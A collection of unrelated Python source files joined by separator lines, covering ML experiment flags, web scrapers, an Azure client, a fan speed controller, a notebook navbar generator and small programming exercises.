print "Seleccione una opcion valida."
elif desea_salir(opcion):
saliendo()
salir = True
else:
print "La opción no es correcta."
if __name__ == "__main__":
main()
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main file used for approxNN project."""
import warnings
from absl import app
from absl import flags
from invariant_explanations import config
from invariant_explanations import other
from invariant_explanations import utils
FLAGS = flags.FLAGS
_RANDOM_SEED = flags.DEFINE_integer(
'random_seed',
42,
'The seed used for all numpy random operations.',
)
_DATASET = flags.DEFINE_string(
'dataset',
'cifar10',
'The dataset, chosen from config.ALLOWABLE_DATASETS.',
)
_EXPLANATION_TYPE = flags.DEFINE_string(
'explanation_type',
'ig',
'The explanation method, chosen from config.ALLOWABLE_EXPLANATION_METHODS.',
)
_RUN_ON_TEST_DATA = flags.DEFINE_boolean(
'run_on_test_data',
False,
'The flag used to specify whether or not to run on sample test data.',
)
_NUM_BASE_MODELS = flags.DEFINE_integer(
'num_base_models',
30000,
'The number of base models to load from the CNN Zoo.',
)
_NUM_SAMPLES_PER_BASE_MODEL = flags.DEFINE_integer(
'num_samples_per_base_model',
32,
'The number of sample images to use per base model.',
)
_NUM_SAMPLES_TO_PLOT_TE_FOR = flags.DEFINE_integer(
'num_samples_to_plot_te_for',
8,
'The number of samples for which to plot treatment effects.',
)
_KEEP_MODELS_ABOVE_TEST_ACCURACY = flags.DEFINE_float(
'keep_models_above_test_accuracy',
0.55,
'The threshold to use when select models from the CNN Zoo.',
)
_USE_IDENTICAL_SAMPLES_OVER_BASE_MODELS = flags.DEFINE_boolean(
'use_identical_samples_over_base_models',
True,
'A flag indicating whether or not to use identical samples on base models.',
)
_MODEL_BATCH_COUNT = flags.DEFINE_integer(
'model_batch_count',
100,
'A total number of model batches to use (from a total of num_base_models).',
)
_MODEL_BATCH_IDX = flags.DEFINE_integer(
'model_batch_idx',
1,
'The index of the batch of models to use for analysis.',
)
warnings.simplefilter('ignore')
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
# Update config file defaults if the arguments are passed in via the cmd line.
config.cfg.set_config_paths({
'RANDOM_SEED': _RANDOM_SEED.value,
'DATASET': _DATASET.value,
'EXPLANATION_TYPE': _EXPLANATION_TYPE.value,
'RUN_ON_TEST_DATA': _RUN_ON_TEST_DATA.value,
'NUM_BASE_MODELS': _NUM_BASE_MODELS.value,
'NUM_SAMPLES_PER_BASE_MODEL': _NUM_SAMPLES_PER_BASE_MODEL.value,
'NUM_SAMPLES_TO_PLOT_TE_FOR': _NUM_SAMPLES_TO_PLOT_TE_FOR.value,
'KEEP_MODELS_ABOVE_TEST_ACCURACY': _KEEP_MODELS_ABOVE_TEST_ACCURACY.value,
'USE_IDENTICAL_SAMPLES_OVER_BASE_MODELS': (
_USE_IDENTICAL_SAMPLES_OVER_BASE_MODELS.value
),
'MODEL_BATCH_COUNT': _MODEL_BATCH_COUNT.value,
'MODEL_BATCH_IDX': _MODEL_BATCH_IDX.value,
})
utils.create_experimental_folders()
# utils.analyze_accuracies_of_base_models()
utils.process_and_resave_cnn_zoo_data(
config.cfg.RANDOM_SEED,
other.get_model_wireframe(),
config.cfg.COVARIATES_SETTINGS,
)
# utils.plot_treatment_effect_values()
# utils.train_meta_model_over_different_setups(config.cfg.RANDOM_SEED)
# utils.save_heat_map_of_meta_model_results()
# utils.process_per_class_explanations(config.cfg.RANDOM_SEED)
# utils.measure_prediction_explanation_variance(config.cfg.RANDOM_SEED)
if __name__ == '__main__':
app.run(main)
|
"""
======================
Random Geometric Graph
======================
Example
"""
import matplotlib.pyplot as plt
import networkx as nx
G = nx.random_geometric_graph(200, 0.125)
# position is stored as node attribute data for random_geometric_graph
pos = nx.get_node_attributes(G, "pos")
# find node near center (0.5,0.5)
dmin = 1
ncenter = 0
for n in pos:
x, y = pos[n]
d = (x - 0.5) ** 2 + (y - 0.5) ** 2
if d < dmin:
ncenter = n
dmin = d
# color by path length from node near center
p = dict(nx.single_source_shortest_path_length(G, ncenter))
plt.figure(figsize=(8, 8))
nx.draw_networkx_edges(G, pos, nodelist=[ncenter], alpha=0.4)
nx.draw_networkx_nodes(
G,
pos,
nodelist=list(p.keys()),
node_size=80,
node_color=list(p.values()),
cmap=plt.cm.Reds_r,
)
plt.xlim(-0.05, 1.05)
plt.ylim(-0.05, 1.05)
plt.axis("off")
plt.show()
|
from typing import AsyncGenerator, Any, Optional
from .base_client import AzureBaseClient
class AzureResourceManagerClient(AzureBaseClient):
def __init__(self, subscription_id: str, resource_group_name: str, **kwargs):
if 'params' not in kwargs:
kwargs['params'] = {}
params = kwargs['params']
if 'api-version' not in params:
params['api-version'] = '2021-04-01'
super().__init__(f'https://management.azure.com/subscriptions/{subscription_id}/resourceGroups/{resource_group_name}/providers/Microsoft.Resources',
**kwargs)
async def list_deployments(self, filter: Optional[str] = None) -> AsyncGenerator[Any, None]:
# https://docs.microsoft.com/en-us/rest/api/resources/deployments/list-by-resource-group
params = {}
if filter is not None:
params['$filter'] = filter
return self._paged_get('/deployments', params=params)
|
if __name__ == "__main__":
(lambda i,n,x:[n:=n+1 for y in range(1,len(i))if(x:=(3+x)%len(i[0]))+1 and i[y][x]=='#'][-1])(open("i",'r').read().split('\n'),0,0)
#
def main_debug(inp,D=1,R=3):
nb=x=y=0
inp = inp.split('\n')
maxx = len(inp[0])
for y in range(0,len(inp),D):
if inp[y][x]=='#':
nb+=1
x=(R+x)%maxx
return nb |
from src.ml_utils.config.config import Config, load_conf
from src.ml_utils.db.couchdb_helper import CouchDBHelper
from cloudant.client import CouchDB
import pytest
import os
DB_NAME = "test_db"
@pytest.fixture(scope="module")
def username():
return os.environ['USERNAME']
@pytest.fixture(scope="module")
def password():
return os.environ['PASSWORD']
@pytest.fixture(scope="module")
def url():
return os.environ['URL']
@pytest.fixture(scope="session", autouse=True)
def db_cleanup(request):
username = os.environ['USERNAME']
password = os.environ['PASSWORD']
url = os.environ['URL']
client = CouchDB(username, password, url=url, connect=True)
def remove_doc():
try:
db = client[DB_NAME]
test_conf = db['test_doc']
test_conf.delete()
client.delete_database(DB_NAME)
print("Deleted")
except KeyError:
print("Nothing to deleted")
def db_shutdown():
client.disconnect()
remove_doc()
request.addfinalizer(remove_doc)
return client
def test_create_database(username, password, url):
db_helper = CouchDBHelper(DB_NAME, username, password, url=url)
db_helper.create_database()
db_helper.connect()
db_helper.disconnect()
def test_save_config_file(username, password, url):
conf_file = load_conf('conf.json', validate_config=True)
c = conf_file.data
assert c.name == "test"
assert c.description == "Some text"
assert c.train['batch_size'] == 128
db_helper = CouchDBHelper(DB_NAME, username, password, url=url)
db_helper.connect()
db_helper.save("test_doc", conf_file)
db_helper.disconnect()
def test_overwrite_config_file(username, password, url):
conf_file = load_conf('conf.json', validate_config=True)
c = conf_file.data
assert c.name == "test"
assert c.description == "Some text"
assert c.train['batch_size'] == 128
db_helper = CouchDBHelper(DB_NAME, username, password, url=url)
db_helper.connect()
db_helper.save("test_doc", conf_file, overwrite=True)
db_helper.disconnect()
db_helper = CouchDBHelper(DB_NAME, username, password, url=url)
db_helper.connect()
try:
db_helper.save("test_doc", conf_file)
assert True, 'expected FileExistsError'
except FileExistsError:
pass
db_helper.disconnect()
def test_load_config_file(username, password, url):
db_helper = CouchDBHelper(DB_NAME, username, password, url=url)
db_helper.connect()
data = db_helper.load("test_doc")
conf = Config(data)
c = conf.build()
assert c.name == "test"
assert c.description == "Some text"
assert c.train['batch_size'] == 128
db_helper.disconnect()
def test_update_config_file(username, password, url):
db_helper = CouchDBHelper(DB_NAME, username, password, url=url)
db_helper.connect()
data = db_helper.load("test_doc")
conf = Config(data)
c = conf.build()
assert c.name == "test"
assert c.description == "Some text"
assert c.train['batch_size'] == 128
conf['train']['batch_size'] = 999
db_helper.save("test_doc", conf, overwrite=True)
payload = db_helper.load("test_doc")
assert payload['train']['batch_size'] == 999
|
#!/usr/bin/env python
# coding=utf-8
"""
Copyright (c) 2010-2015, Ryan Fan <reg_info@126.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os
from distutils.version import LooseVersion
import django
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from web.core.management.commands._params import WXMPParams
LEGACY_MODE = LooseVersion(django.get_version()) < LooseVersion("1.8")
WXMP_CONFIG_FILE = "wxconfig.py"
class WXMPConfig(object):
def __init__(self, top_dir):
self.top_dir = top_dir
self.filename = WXMP_CONFIG_FILE
self.params = WXMPParams(self)
def proceed(self):
self.params.get_inputs()
def save(self):
self.params.save()
class Command(BaseCommand):
"""
If Django version <1.8, it use option_list to add additional options
If Django version >=1.8, it use add_parse() function to add additional options
"""
help = "Configure Weixin public account"
args = '[optional destination directory]'
if LEGACY_MODE:
from optparse import make_option
option_list = BaseCommand.option_list + (
#make_option(),
)
# only useful for Django version >= 1.8
def add_arguments(self, parser):
# Positional arguments
# parser.add_argument('id', nargs='+', type=int)
# Named (optional) arguments
parser.add_argument(
'-h',
'--help',
action='store_true',
dest='help_config',
default=False,
help='Help how to configure Weixin public account'
)
def validate_top_dir(self, top_dir):
"""
Try to locate where is the WXMP app's dir
"""
if not os.path.exists(top_dir):
raise CommandError("Target directory '%s' does not exist,"
"please create it: django-admin.py startapp wxmp_bak." % top_dir)
if not os.access(top_dir, os.W_OK|os.X_OK):
raise CommandError("Target directory '%s' must writable by current user,"
"please correct permission." % top_dir)
def handle(self, dir=None, **options):
if dir is None:
top_dir = os.getcwd()
else:
top_dir = os.path.abspath(os.path.expanduser(dir))
self.validate_top_dir(top_dir)
config = WXMPConfig(top_dir)
config.proceed()
config.save()
self.stdout.write("")
self.stdout.write("Successfully save wxmp_bak config file:{0}".format(os.path.join(top_dir, WXMP_CONFIG_FILE)))
self.stdout.write("You need put it under '<consumer dir>/wxmp_bak/' subdirectory.")
|
import os
import re
from setuptools import setup
__name__ = 'treewalker'
project_urls = {
'Home page': 'https://pypi.org/project/treewalker',
'Source Code': 'https://github.com/jaapvandervelde/treewalker',
'Documentation': 'https://treewalker.readthedocs.io/'
}
version_fn = os.path.join(__name__, "_version.py")
__version__ = "unknown"
try:
version_line = open(version_fn, "rt").read()
except EnvironmentError:
pass # no version file
else:
version_regex = r"^__version__ = ['\"]([^'\"]*)['\"]"
m = re.search(version_regex, version_line, re.M)
if m:
__version__ = m.group(1)
else:
print('unable to find version in {}'.format(version_fn))
raise RuntimeError('If {} exists, it is required to be well-formed'.format(version_fn))
with open("README.md", "r") as rm:
long_description = rm.read()
setup(
name=__name__,
packages=['treewalker'],
version=__version__,
license='MIT',
description='A simple package to walk a directory tree and collect files and sizes into a SQLite DB.',
# long description will be the contents of project/README.md
long_description=long_description,
long_description_content_type='text/markdown',
author='BMT Commercial Australia Pty Ltd, Jaap van der Velde',
author_email='jaap.vandervelde@bmtglobal.com',
url='https://gitlab.com/bmt-aus/tool/treewalker.git',
project_urls=project_urls,
# TODO: update keywords
keywords=['system', 'tool', 'database'],
install_requires=['conffu==2.2.16', 'scandir', 'typing'],
extras_require={
'dev': [
'mkdocs',
'pymdown-extensions'
]
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.4',
],
entry_points={
'console_scripts': ['treewalker=treewalker.treewalker:cli_entry_point'],
}
)
|
# -*- coding: utf-8 -*-
from collections import Counter
from typing import List
class Solution:
def countStudents(self, students: List[int], sandwiches: List[int]) -> int:
counts = Counter(students)
for sandwich in sandwiches:
if counts[sandwich] > 0:
counts[sandwich] -= 1
else:
break
return sum(counts.values())
if __name__ == '__main__':
solution = Solution()
assert 0 == solution.countStudents([1, 1, 0, 0], [0, 1, 0, 1])
assert 3 == solution.countStudents([1, 1, 1, 0, 0, 1], [1, 0, 0, 0, 1, 1])
|
import os
import shutil
from pathlib import Path
class FileManager:
def __init__(self):
self.backup_path = ""
self.symbols = "?><\\/:*|"
def set_backup_path(self, path: str) -> None:
self.backup_path = path
def get_backup_path(self) -> str:
return self.backup_path
def createfile(self, path: str) -> None:
filename = os.path.split(path)[1]
for sym in self.symbols:
if sym in filename:
return False
Path(path).touch()
return True
def createfolder(self, path: str) -> None:
foldername = os.path.split(path)[1]
for sym in self.symbols:
if sym in foldername:
return False
os.mkdir(path)
def rename(self, new_name: str, filepath: str) -> bool:
for sym in self.symbols:
if sym in new_name:
return False
prefix = os.path.split(filepath)[0]
new_filepath = os.path.join(prefix, new_name)
if not os.path.isfile(new_filepath):
try:
os.rename(filepath, new_filepath)
return True
except:
print("PermissionError")
return False
def delete(self, path: str) -> bool:
try:
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
return True
except PermissionError:
return False
def backup(self, path: str) -> bool:
# 沒有設置備份路徑的情況
if self.backup_path == "":
return False
if os.path.isfile(path):
try:
shutil.copy(path, self.backup_path)
except PermissionError:
return False
else:
new_path = os.path.join(self.backup_path, os.path.basename(path))
try:
if os.path.exists(new_path):
return False
shutil.copytree(path, new_path)
except PermissionError:
return False
return True
|
import scrapy
from ..items import NewsScrapeItem
import re
class SanookSpider(scrapy.Spider):
name = "sanook"
def start_requests(self):
urls = ['https://www.sanook.com/news/']
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
urls = response.css('.col-lg-4 .text-color-news a::attr(href)').extract()
for i in urls:
i = 'https:'+i
yield scrapy.Request(url=i, callback=self.parse_news)
def parse_news(self, response):
items = NewsScrapeItem()
date = response.css('time.jsx-2376132709::text').extract_first()
head = response.css('.jsx-2761676397.title::text').extract_first()
img = response.css('.jsx-2954975791').xpath('img/@src').extract_first()
cat = response.css('.jsx-2080913917.text-color-news::text').extract_first()
body = response.css('strong::text , #EntryReader_0 p::text').extract()
items['body'] = body
items['date'] = date
items['head'] = head
items['img'] = img
items['category'] = cat
yield items
#%% |
from . import config_params
from . import thermometer
from . import harddrive
from . import util
import collections
import logging
import time
logger = logging.getLogger(__name__)
class Fan(config_params.Configurable):
_params = [
("name", None, "Name that will appear in status output."),
("min_pwm", 80, "Initial value for minimal allowed nonzero PWM value. Below this the fan will stay on minimum in settle mode and then stop when the settle timeout runs out. This value will be modified to track the actual fan limits."),
("spinup_pwm", 128, "Minimal pwm settings to overcome static friction in the fan."),
("spinup_time", 10, "How long to keep the spinup pwm for start."),
("min_settle_time", 30, "Minimal number of seconds at minimum pwm before stopping the fan."),
("max_settle_time", 12 * 60 * 60, "Maximal number of seconds at minimum pwm before stopping the fan."),
("pid", config_params.InstanceOf([util.Pid], Exception), "PID controller for this fan."),
("thermometers", config_params.ListOf([thermometer.SystemThermometer,
harddrive.Harddrive,
thermometer.MockThermometer]), ""),
("fan_max_rpm_sanity_check", 0, "Fan speed larger than this value are considered as a glitch reading and ignored. Value of 0 means to not check the range."),
]
def __init__(self, parent, params):
self.process_params(params)
self._state = "running"
self._spinup_timer = util.TimeoutHelper(self.spinup_time)
self._settle_timer = util.TimeoutHelper(self.min_settle_time)
self._min_pwm_helper = _MinPowerHelper(self.min_pwm, 1, parent.min_rpm_probe_interval)
self._last_pwm = None
self.set_pwm_checked(255)
self._last_rpm = 0
duplicate_thermometer_names = util.duplicates(thermometer.name for thermometer in self.thermometers)
if duplicate_thermometer_names:
raise ValueError("Duplicate thermometer names: {}".format(", ".join(duplicate_thermometer_names)))
def get_rpm(self):
""" Read rpm of the fan. Needs to be overridden. """
raise NotImplementedError()
def set_pwm(self, pwm):
""" Set the PWM input the fan. Needs to be overridden. """
raise NotImplementedError()
def set_pwm_checked(self, pwm):
""" Wrapped set_pwm, deduplicates and logs speed changes """
pwm = int(pwm)
if pwm > 255:
pwm = 255
if pwm == self._last_pwm:
return
logger.debug("Setting {} to {}".format(self.name, self._pwm_to_percent(pwm)))
self.set_pwm(pwm)
self._last_pwm = pwm
@staticmethod
def _pwm_to_percent(pwm):
return str((100 * pwm) // 255) + "%"
def _change_state(self, state):
""" Change state and log it """
self._state = state
logger.debug("Changing state of {} to {}".format(self.name, state))
def update(self, dt):
""" This is where the internal state machine is implemented """
new_dt = float("inf")
status_block = {}
rpm = self.get_rpm()
if self.fan_max_rpm_sanity_check != 0 and rpm > self.fan_max_rpm_sanity_check:
logger.warning("Detected glitch speed reading of {} ({}), using last value of {} instead.",
self.name, rpm, self._last_rpm)
rpm = self._last_rpm
else:
logger.debug("Speed of {} is {} rpm".format(self.name, rpm))
status_block["rpm"] = rpm
thermometers_status = {}
for thermometer in self.thermometers:
thermometers_status[thermometer.name] = thermometer.update(dt)
status_block["thermometers"] = thermometers_status
errors = [t.get_normalized_temperature_error()
for t in self.thermometers]
max_error = max(errors)
pwm, max_derivative = self.pid.update(errors, dt)
clamped_pwm = clamped_pwm = util.clamp(pwm, self._min_pwm_helper.value, 255)
if rpm == 0 and self._state in ("running", "settle"):
self._spinup(clamped_pwm)
self._min_pwm_helper.failed()
logger.info("%s not spinning when it should, increasing min PWM to %s",
self.name,
self._pwm_to_percent(self._min_pwm_helper.value))
elif self._state in ("running", "spinup"):
if self._state == "spinup":
if self._spinup_timer(dt):
self._change_state("running")
else:
new_dt = min(new_dt, self._spinup_timer.remaining_time)
clamped_pwm = max(clamped_pwm, self.spinup_pwm)
self.set_pwm_checked(clamped_pwm)
if max_error < 0 and clamped_pwm <= self._min_pwm_helper.value:
self._settle_timer.reset()
self._change_state("settle")
logger.debug("Settle time for {} is {}s".format(self.name, self._settle_timer.limit))
elif self._state == "settle":
if max_error > 0 or clamped_pwm > self._min_pwm_helper.value:
self.set_pwm_checked(clamped_pwm)
self._change_state("running")
elif self._settle_timer(dt):
self.set_pwm_checked(0)
self._change_state("stopped")
else:
self._min_pwm_helper.update(dt)
self.set_pwm_checked(self._min_pwm_helper.value)
elif self._state == "stopped":
self.pid.reset_accumulator()
if max_error > 0:
self._spinup(clamped_pwm)
# Increase settle timer when spinning up, to avoid periodic spinups and spin downs
# due to minimum allowed fan RPM being too much for the required temperature
self._settle_timer.limit = min(self._settle_timer.limit * 2,
self.max_settle_time)
elif max_derivative <= 0:
# If the derivative is not increasing, then we are in steady state and we start
# decreasing settle timer
self._settle_timer.limit = max(self._settle_timer.limit - dt,
self.min_settle_time)
else:
raise Exception("Unknown state " + self._state)
status_block["pid"] = {"error": max_error, "derivative": 60*max_derivative, "integrator": self.pid._integrator/60} # Derivative is in degrees / minute, integrator in minutes
status_block["min_pwm"] = self._min_pwm_helper.value
status_block["settle_timeout"] = self._settle_timer.limit
return new_dt, status_block
def _spinup(self, pwm):
self.set_pwm_checked(max(pwm, self.spinup_pwm))
self._change_state("spinup")
self._spinup_timer.reset()
class SystemFan(Fan, config_params.Configurable):
_params = [
("pwm_path", None, "Path in (typically /sys/class/hwmon/hwmon?/pwm?) that is used to set fan pwm setting"),
("rpm_path", None, "Path in (typically /sys/class/hwmon/hwmon?/fan?_input) that is used to set rpm"),
]
def __init__(self, parent, params):
super().__init__(parent, params)
if not len(self.name):
self.name = self.get_automatic_name()
def get_rpm(self):
with open(self.rpm_path, "r") as fp:
return int(fp.readline())
def set_pwm(self, value):
with open(self.pwm_path, "w") as fp:
print(str(value), file=fp)
class MockFan(Fan, config_params.Configurable):
_params = [
("name", None, "Name that will appear in status output."),
("rpm", 1234, "RPM shown."),
]
def get_rpm(self):
return self.rpm
def set_pwm(self, value):
pass
class _MinPowerHelper:
""" Helper state machine that tracks the minimum allowed PWM input of a fan. """
def __init__(self, initial_value, step, probe_interval):
self.value = initial_value
self._step = step
self._probe_timeout = util.TimeoutHelper(probe_interval)
self._probing = True
def update(self, dt):
if self._probing:
self.value -= self._step
elif self._probe_timeout(dt):
self._probing = True
self.value -= self._step
return self.value
def failed(self):
self.value += self._step
self._probing = False
self._probe_timeout.reset()
|
#!/usr/bin/env python3
import os
import itertools
import sys
import re
from ipykernel import kernelspec as ks
import nbformat
from nbformat.v4.nbbase import new_markdown_cell
#from generate_contents import NOTEBOOK_DIR, REG, iter_notebooks, get_notebook_title
#NOTEBOOK_DIR = os.path.join(os.path.dirname(__file__), '..', 'notebooks')
NOTEBOOK_DIR = os.path.join(os.path.dirname(__file__))
def prev_this_next(it):
a, b, c = itertools.tee(it,3)
next(c)
return zip(itertools.chain([None], a), b, itertools.chain(c, [None]))
PREV_TEMPLATE = "< [{title}]({url}) "
CONTENTS = "| [Contents](Index.ipynb) |"
NEXT_TEMPLATE = " [{title}]({url}) >"
NAV_COMMENT = "<!--NAVIGATION-->\n"
COLAB_LINK = """
<a href="https://colab.research.google.com/github/csmastersUH/data_analysis_with_python_2020/blob/master/{notebook_filename}"><img align="left" src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open in Colab" title="Open and Execute in Google Colaboratory"></a>
"""
def iter_notebooks():
return sys.argv[1:]
def iter_navbars():
for prev_nb, nb, next_nb in prev_this_next(iter_notebooks()):
navbar = NAV_COMMENT
#if prev_nb:
# navbar += PREV_TEMPLATE.format(title=get_notebook_title(prev_nb),
# url=prev_nb)
#navbar += CONTENTS
#if next_nb:
# navbar += NEXT_TEMPLATE.format(title=get_notebook_title(next_nb),
# url=next_nb)
navbar += COLAB_LINK.format(notebook_filename=os.path.basename(nb))
yield os.path.join(NOTEBOOK_DIR, nb), navbar
def get_notebook_exercises(nb):
result = []
for cell in nb.cells:
# if cell.source.startswith('<div class="alert alert-info">') and cell.cell_type != "code":
if cell.source.startswith('#### <div class="alert alert-info">') and cell.cell_type != "code":
# line = cell.source.splitlines()[0]
line = cell.source
exercise_name = re.search(r">(.*)<", line).group(1)
# exercise_name = re.search(r"^#### (.*)$", line, re.MULTILINE).group(1)
result.append(exercise_name)
return result
def to_nbsphinx(s):
"""Use the sphinx naming style for anchors of headings"""
s = s.replace(" ", "-").lower()
return "".join(filter(lambda c : c not in "()", s))
def to_github(s):
"""Use the github naming style for anchors of headings"""
s = s.replace(" ", "-")
s = re.sub(r"\)$", ")", s) # In notebook the link cannot end in closing parenthesis
return s
def write_navbars():
for nb_name, navbar in iter_navbars():
nb = nbformat.read(nb_name, as_version=4)
nb_file = os.path.basename(nb_name)
is_comment = lambda cell: cell.source.startswith(NAV_COMMENT)
exercises = get_notebook_exercises(nb)
n = len(exercises)
if n > 0:
exercise_links = [ "[%s](<#%s>)" % (e, to_github(e)) for e in exercises ]
longest_field = max(len(e) for e in exercise_links)
print(exercise_links)
print("%i exercises" % n)
columns = 3
if n < columns:
columns = n
table = []
empty=" " * (longest_field + 2)
column_title = "-".center(longest_field + 2)
dash="-" * (longest_field + 2)
table.append("|%s\n" % (("%s|" % column_title)*columns)) # No column title
table.append("|%s\n" % (("%s|" % dash)*columns)) # separator line
for i, e in enumerate(exercise_links):
if i % columns == 0: # Start a new row
table.append("|")
table.append(" %s |" % e.center(longest_field))
if i % columns == (columns-1): # Row is full
table.append("\n")
remainder = n % columns
if remainder > 0:
table.append("%s\n" % (("%s|" % empty)* (columns - remainder)))
table = "".join(table)
print(table)
header = "%s\n%s\n" % (navbar, table)
else:
header = "%s\n" % (navbar) # no exercises
if is_comment(nb.cells[0]):
print("- amending navbar for {0}".format(nb_file))
nb.cells[0].source = header
else:
print("- inserting navbar for {0}".format(nb_file))
nb.cells.insert(0, new_markdown_cell(source=header))
if is_comment(nb.cells[-1]):
nb.cells[-1].source = navbar
else:
nb.cells.append(new_markdown_cell(source=navbar))
nbformat.write(nb, nb_name)
if __name__ == '__main__':
write_navbars()
|
import unittest
from aula4.pilha import Pilha, PilhaVaziaErro
def esta_balanceada(expressao):
"""
Função que calcula se expressão possui parenteses, colchetes e chaves balanceados
O Aluno deverá informar a complexidade de tempo e espaço da função
Deverá ser usada como estrutura de dados apenas a pilha feita na aula anterior
:param expressao: string com expressao a ser balanceada
:return: boleano verdadeiro se expressao está balanceada e falso caso contrário
"""
#Análise de Complexidade
#Tempo e memória são O(n)
pilha = Pilha()
if expressao == "":
return True
elif expressao[0] in ')}]':
return False
else:
for caracter in expressao:
if caracter in '({[':
pilha.empilhar(caracter)
else:
try:
desenpilhado = pilha.desempilhar()
except PilhaVaziaErro:
return pilha.vazia()
if caracter == '}' and desenpilhado != '{':
return False
elif caracter == ']' and desenpilhado != '[':
return False
elif caracter == ')' and desenpilhado != '(':
return False
return pilha.vazia()
class BalancearTestes(unittest.TestCase):
def test_expressao_vazia(self):
self.assertTrue(esta_balanceada(''))
def test_parenteses(self):
self.assertTrue(esta_balanceada('()'))
def test_chaves(self):
self.assertTrue(esta_balanceada('{}'))
def test_colchetes(self):
self.assertTrue(esta_balanceada('[]'))
def test_todos_caracteres(self):
self.assertTrue(esta_balanceada('({[]})'))
self.assertTrue(esta_balanceada('[({})]'))
self.assertTrue(esta_balanceada('{[()]}'))
def test_chave_nao_fechada(self):
self.assertFalse(esta_balanceada('{'))
def test_colchete_nao_fechado(self):
self.assertFalse(esta_balanceada('['))
def test_parentese_nao_fechado(self):
self.assertFalse(esta_balanceada('('))
def test_chave_nao_aberta(self):
self.assertFalse(esta_balanceada('}{'))
def test_colchete_nao_aberto(self):
self.assertFalse(esta_balanceada(']['))
def test_parentese_nao_aberto(self):
self.assertFalse(esta_balanceada(')('))
def test_falta_de_caracter_de_fechamento(self):
self.assertFalse(esta_balanceada('({[]}'))
def test_falta_de_caracter_de_abertura(self):
self.assertFalse(esta_balanceada('({]})'))
def test_expressao_matematica_valida(self):
self.assertTrue(esta_balanceada('({[1+3]*5}/7)+9'))
def test_char_errado_fechando(self):
self.assertFalse(esta_balanceada('[)')) |
# -*- coding: utf-8 -*-
import datetime
import re
import scrapy
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
DAY_MAPPING = {
"Monday": "Mo",
"Tuesday": "Tu",
"Wednesday": "We",
"Thursday": "Th",
"Friday": "Fr",
"Saturday": "Sa",
"Sunday": "Su",
}
class EinsteinBrosSpider(scrapy.Spider):
download_delay = 0.5
name = "einsteinbros"
item_attributes = {"brand": "Einstein Bros. Bagels"}
allowed_domains = ["einsteinbros.com"]
start_urls = ("https://locations.einsteinbros.com/us",)
def parse_hours(self, elements):
opening_hours = OpeningHours()
for elem in elements:
day = elem.xpath(
'.//td[@class="c-location-hours-details-row-day"]/text()'
).extract_first()
intervals = elem.xpath(
'.//td[@class="c-location-hours-details-row-intervals"]'
)
if intervals.xpath("./text()").extract_first() == "Closed":
continue
if intervals.xpath("./span/text()").extract_first() == "Open 24 hours":
opening_hours.add_range(
day=DAY_MAPPING[day], open_time="0:00", close_time="23:59"
)
else:
start_time = elem.xpath(
'.//span[@class="c-location-hours-details-row-intervals-instance-open"]/text()'
).extract_first()
end_time = elem.xpath(
'.//span[@class="c-location-hours-details-row-intervals-instance-close"]/text()'
).extract_first()
opening_hours.add_range(
day=DAY_MAPPING[day],
open_time=datetime.datetime.strptime(
start_time, "%H:%M %p"
).strftime("%H:%M"),
close_time=datetime.datetime.strptime(
end_time, "%H:%M %p"
).strftime("%H:%M"),
)
return opening_hours.as_opening_hours()
def parse_store(self, response):
ref = re.search(r".+/(.+)$", response.url).group(1)
address1 = response.xpath(
'//span[@class="c-address-street-1"]/text()'
).extract_first()
address2 = (
response.xpath('//span[@class="c-address-street-2"]/text()').extract_first()
or ""
)
properties = {
"addr_full": " ".join([address1, address2]).strip(),
"phone": response.xpath(
'//span[@itemprop="telephone"]/text()'
).extract_first(),
"city": response.xpath(
'//span[@class="c-address-city"]/text()'
).extract_first(),
"state": response.xpath(
'//span[@itemprop="addressRegion"]/text()'
).extract_first(),
"postcode": response.xpath(
'//span[@itemprop="postalCode"]/text()'
).extract_first(),
"country": response.xpath(
'//abbr[@itemprop="addressCountry"]/text()'
).extract_first(),
"ref": ref,
"website": response.url,
"lat": float(
response.xpath('//meta[@itemprop="latitude"]/@content').extract_first()
),
"lon": float(
response.xpath('//meta[@itemprop="longitude"]/@content').extract_first()
),
"name": response.xpath('//h1[@id="location-name"]/text()').extract_first(),
}
hours = self.parse_hours(
response.xpath('//table[@class="c-location-hours-details"]//tbody/tr')
)
if hours:
properties["opening_hours"] = hours
yield GeojsonPointItem(**properties)
def parse(self, response):
urls = response.xpath('//a[@class="Directory-listLink"]/@href').extract()
is_store_list = response.xpath(
'//section[contains(@class,"LocationList")]'
).extract()
if not urls and is_store_list:
urls = response.xpath(
'//a[contains(@class,"Teaser-titleLink")]/@href'
).extract()
for url in urls:
if re.search(r"us/.{2}/.+/.+", url):
yield scrapy.Request(response.urljoin(url), callback=self.parse_store)
else:
yield scrapy.Request(response.urljoin(url))
|
# 1 - The volume of a sphere with radius r is 4/3 πr**3. What is the volume of a sphere with radius 5?
